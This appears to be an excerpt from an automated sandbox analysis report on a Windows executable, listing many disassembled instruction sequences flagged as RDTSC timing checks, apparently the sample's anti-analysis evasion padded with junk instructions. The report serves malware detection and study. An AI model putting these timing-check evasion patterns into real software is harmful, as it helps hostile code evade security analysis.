                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E2C760 second address: E2C764 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E2964B second address: E2964F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E2E72B second address: E2E732 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E315B5 second address: E315D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF4h 0x00000007 je 00007F43C9098CE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E31B67 second address: E31B6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E31B6E second address: E31BB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F43C9098CE8h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 sub dword ptr [ebp+122D1B58h], esi 0x0000002a push 00000000h 0x0000002c mov bl, 87h 0x0000002e push 00000000h 0x00000030 mov edi, dword ptr [ebp+122D2A69h] 0x00000036 xchg eax, esi 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a push ebx 0x0000003b pop ebx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E31BB1 second address: E31BB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E32BF7 second address: E32BFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E32BFB second address: E32C0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F43C8AE007Ah 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E31DB1 second address: E31DC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 jo 00007F43C9098CF0h 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E2A87F second address: E2A892 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43C8AE007Fh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E37B38 second address: E37B42 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F43C9098CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E3BDB5 second address: E3BDBB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E3BDBB second address: E3BDC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E3BDC5 second address: E3BDCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F43C8AE0076h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E3BDCF second address: E3BDD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E3B653 second address: E3B657 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E3B657 second address: E3B662 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E3B7B4 second address: E3B7C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0080h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E3B917 second address: E3B921 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F43C9098CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E3B921 second address: E3B952 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F43C8AE007Ah 0x00000008 je 00007F43C8AE007Ch 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pushad 0x00000014 popad 0x00000015 pop esi 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007F43C8AE007Dh 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E3B952 second address: E3B956 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E3B956 second address: E3B96B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43C8AE007Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E3B96B second address: E3B971 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E40B04 second address: E40B0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E40BD5 second address: E40BD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E40D0A second address: E40D55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edi 0x00000008 push eax 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c pop edi 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jbe 00007F43C8AE0089h 0x00000017 jmp 00007F43C8AE0083h 0x0000001c mov eax, dword ptr [eax] 0x0000001e jp 00007F43C8AE00A7h 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F43C8AE0087h 0x0000002b rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E459DC second address: E459E6 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F43C9098CE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E459E6 second address: E459F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E459F1 second address: E45A0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F43C9098CEBh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E45B80 second address: E45B8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E45B8F second address: E45B9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jng 00007F43C9098CE6h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E45B9F second address: E45BA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E45CDF second address: E45CFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E46135 second address: E46144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F43C8AE0076h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E46144 second address: E46148 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E462C1 second address: E462D9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F43C8AE0076h 0x00000008 js 00007F43C8AE0076h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jl 00007F43C8AE0082h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E4659F second address: E465A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DC28C0 second address: DC28D1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F43C8AE007Ch 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DC28D1 second address: DC28E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jl 00007F43C9098CE6h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jno 00007F43C9098CE6h 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DC28E9 second address: DC28ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DC28ED second address: DC2903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007F43C9098CF2h 0x0000000e jp 00007F43C9098CE6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E5311B second address: E53135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43C8AE007Dh 0x00000009 pop ebx 0x0000000a push ecx 0x0000000b jns 00007F43C8AE0076h 0x00000011 pop ecx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E532B7 second address: E532BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E532BB second address: E532D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F43C8AE0087h 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E53458 second address: E5345E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E5345E second address: E53462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E53462 second address: E534A1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F43C9098CF8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f jnl 00007F43C9098CE6h 0x00000015 jmp 00007F43C9098CEEh 0x0000001a pop ebx 0x0000001b jl 00007F43C9098CE8h 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E53E9C second address: E53EA2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E5A263 second address: E5A269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E5A269 second address: E5A28A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Dh 0x00000007 je 00007F43C8AE0076h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 jp 00007F43C8AE0076h 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E5A28A second address: E5A290 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: DC9578 second address: DC9580 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E58FC3 second address: E58FEC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F43C9098CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F43C9098CF0h 0x00000012 jmp 00007F43C9098CECh 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E58FEC second address: E58FF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E58FF4 second address: E58FF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E59191 second address: E59196 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E59347 second address: E59351 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F43C9098CE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E59351 second address: E59357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E5947B second address: E59480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E59480 second address: E5948A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F43C8AE007Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E5948A second address: E59491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E595F4 second address: E59634 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0088h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a ja 00007F43C8AE0076h 0x00000010 jmp 00007F43C8AE0085h 0x00000015 push edx 0x00000016 pop edx 0x00000017 popad 0x00000018 pop edi 0x00000019 push ecx 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E59634 second address: E5963A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E59A37 second address: E59A3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E59A3B second address: E59A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E106DD second address: E106E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E106E1 second address: E106EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E10902 second address: E10907 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E10907 second address: E1090E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E10B8B second address: E10BAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0080h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jno 00007F43C8AE0076h 0x00000015 popad 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E10CDB second address: E10CE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E10CE1 second address: E10CE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E10CE7 second address: E10D10 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F43C9098CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 jmp 00007F43C9098CF8h 0x00000015 pop edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E10DC7 second address: E10E18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 jno 00007F43C8AE0088h 0x0000000f mov eax, dword ptr [eax] 0x00000011 jnl 00007F43C8AE0095h 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E10E18 second address: E10E1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E10E1D second address: E10E22 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E10E22 second address: E10E57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007F43C9098CE8h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000016h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 call 00007F43C9098CE9h 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E10E57 second address: E10E5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E10E5B second address: E10E61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E10E61 second address: E10E79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43C8AE0084h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E10E79 second address: E10E7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E10E7D second address: E10EAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jl 00007F43C8AE0084h 0x0000000f pushad 0x00000010 jnl 00007F43C8AE0076h 0x00000016 jnc 00007F43C8AE0076h 0x0000001c popad 0x0000001d mov eax, dword ptr [esp+04h] 0x00000021 pushad 0x00000022 push esi 0x00000023 jnl 00007F43C8AE0076h 0x00000029 pop esi 0x0000002a push eax 0x0000002b push edx 0x0000002c push edx 0x0000002d pop edx 0x0000002e rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E10EAB second address: E10EC7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F43C9098CF1h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E10EC7 second address: E10EEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F43C8AE007Dh 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E1105F second address: E11068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E112FB second address: E11300 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E11817 second address: E11821 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F43C9098CE6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E5E39A second address: E5E3A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E5E515 second address: E5E543 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CECh 0x00000007 jg 00007F43C9098CE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jns 00007F43C9098CE6h 0x00000016 jmp 00007F43C9098CEAh 0x0000001b jg 00007F43C9098CE6h 0x00000021 popad 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E61CD5 second address: E61CDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E61E9C second address: E61EA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E61EA0 second address: E61EB0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
